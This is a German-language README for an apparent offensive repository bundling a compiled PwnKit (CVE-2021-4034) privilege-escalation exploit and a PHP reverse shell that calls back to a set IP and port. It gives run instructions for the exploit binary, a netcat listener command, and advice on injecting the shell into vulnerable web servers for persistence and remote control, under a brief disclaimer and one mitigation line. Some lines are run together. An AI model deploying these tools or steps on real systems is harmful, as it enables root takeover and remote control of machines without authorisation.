
Sicherheitsforschungs-Repository mit einem Proof-of-Concept (PoC) für die Schwachstelle CVE-2021-4034 (PwnKit) und Scripting-Dienstprogrammen zur Demonstration von Privilegieneskalation und Remote-Ausführung in Linux-Umgebungen.
⚠️ HAFTUNGSAUSSCHLUSS: Dieses Repository wurde ausschließlich zu Bildungs- und Sicherheitsforschungszwecken erstellt. Der Autor übernimmt keine Haftung für den Missbrauch dieser Werkzeuge. Verwende es nur in kontrollierten Umgebungen oder wo du ausdrückliche Erlaubnis hast.
Dieses Repository enthält einen kompilierten Proof of Concept (PoC) für die PwnKit-Schwachstelle (CVE-2021-4034), einen kritischen lokalen Privilegieneskalationsfehler in der pkexec-Komponente von Polkit.
Darüber hinaus ist ein PHP-Reverse-Shell-Skript enthalten, das nach der Exploitation oder als initialer Zugangsvektor bereitgestellt werden kann.
Erlangen von root-Zugriff auf verwundbare Linux-Systeme und Aufbau von Persistenz oder Fernsteuerung mittels einer Reverse-Shell.
PwnKit (ELF Binary)Der kompilierte Exploit für CVE-2021-4034.
pkexec, um eine bösartige Shared Library zu laden und Code als root auszuführen.pkexec auf dem Ziel installiert ist.reverseShell.phpEin leichtes Payload zum Aufbau einer Reverse-Verbindung.
192.168.1.84444/bin/bashphp reverseShell.php) ausgeführt oder in einen verwundbaren Webserver injiziert werden.PwnKit auf das Zielsystem.chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php, falls deine IP von der standardmäßig konfigurierten abweicht.php reverseShell.php
Diese Schwachstelle liegt darin, wie pkexec die Befehlszeilenargumente verarbeitet. Wenn eine leere Argumentliste übergeben wird, versucht pkexec auf argv[1] außerhalb der Grenzen zuzugreifen, was es einem Angreifer ermöglicht, Umgebungsvariablen im Speicher zu überschreiben, insbesondere durch Injektion einer bösartigen GCONV_PATH-Variable, um den Ausführungsfluss zu entführen.
Um sich vor diesem Exploit zu schützen:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️